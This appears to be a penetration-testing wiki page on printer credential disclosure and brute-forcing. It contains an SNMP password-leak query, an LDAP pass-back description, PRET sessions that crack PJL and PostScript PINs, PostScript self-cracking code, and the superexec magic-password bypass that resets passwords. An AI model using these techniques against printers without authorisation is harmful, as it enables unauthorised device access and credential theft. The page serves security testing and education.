3.6 KiB
Credentials Disclosure / Brute-Force
Printers are commonly deployed with a** default password or no initial password at all**. In both cases, end-users or administrators have to actively set a password to secure the device.
Password Disclosure
SNMP
Ancient HP printers had a vulnerable OID that returned the password. Other vendors may have similar SNMP based issues.
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
Pass-Back
If the printer is authorising people using an external LDAP. If you have access to the change this settings (maybe using a web console interface) you can make the printer connects to your LDAP server and authorise any user.
Note that you could abuse this settings also to** steal the credentials the printer is using** to connect to the LDAP server. Read here to learn more.
Brute-Force
PJL
PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size. Noways in less than 30min you can guess the correct password.
You can use lock
and unlock
commands of PRET to test bruteforce:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF
PostScript
PostScript offers two types of passwords: The SystemParamsPassword
is used to change print job settings like paper size, while the StartJobPassword
is required to exit the server loop and therefore permanently alter the PostScript environment.
Brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself:
/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
Another approach is to bypass PostScript passwords by resetting them with Adobe's proprietary superexec
operator. This operator resides in the internaldict dictionary, which is ‘protected’ by a static, magic password (1183615869
). Wrapping PostScript code into superexec allows an attacker to ignore various protection mechanisms of the language, which would normally raise an invalidaccess error. This can be used to set PostScript passwords without initially submitting the current password as shown below:
{ << /SystemParamsPassword (0)
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec
The lock and unlock commands of PRET can be used to test brute-force attacks against numeric (integer) PostScript passwords or to **bypass **them with superexec magic:
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0
More information about Password Disclosure and Brute-Force in http://hacking-printers.net/wiki/index.php/Credential_disclosure